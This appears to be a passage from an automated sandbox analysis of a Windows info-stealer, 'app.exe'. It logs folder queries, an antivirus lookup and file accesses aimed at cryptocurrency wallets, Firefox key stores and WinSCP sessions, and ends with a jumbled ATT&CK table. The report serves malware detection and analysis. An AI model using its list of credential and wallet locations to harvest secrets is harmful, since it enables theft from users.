Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms\Unistore VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache\3534848bb9f4cb71 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache\cb00da9ba77862e VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google\CrashReports VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google\Software Reporter Tool VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Intel\CUIPromotions VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Intel\Games VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\EdgeBho VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Feeds VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\GameDVR VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Internet Explorer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\OneDrive VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\PlayReady VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\XboxLive VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\ActiveSync VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\AppUp.IntelGraphicsExperience_8j3eq9eme6ctt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.1_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.6_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\SpotifyAB.SpotifyMusic_zpdnekdrzrea0 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0487075091 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0615447233 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0825612946 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0887538035 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0939541263 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1169381505 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1244065654 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1287572840 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1343496627 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1387277564 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1417002460 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2165547404 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2265332024 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2265465471 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2874006916 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3677062445 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\acrord32_sbx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Importer_6_Default_4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MpCmdRun.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Symbols VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\TCDE6EA.tmp VolumeInformation
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041C882 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041DD1B GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00415DDE EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Electrum\wallets\tjYCo5b
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :"AtomicWallet","path":"%APPDATA%\\atomic\\Local Storage\\leveldb\\"},{"name":"Exodus","path":"%APPDATA%\\exodus\\exodus.wallet\\"},{"name":"JaxxWallet","path":"%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\"},{"
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000003.3292397056.000000000556B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Coinomi\Coinomi\wallets\
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\exodus\exodus.wallet\Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\XdPr
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\Local Settings\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
Bootkit
11
Process Injection
1
Deobfuscate/Decode Files or Information
1
Input Capture
2
File and Directory Discovery
Remote Desktop Protocol3
Data from Local System
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
1
Credentials in Registry
45
System Information Discovery
SMB/Windows Admin Shares1
Input Capture
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
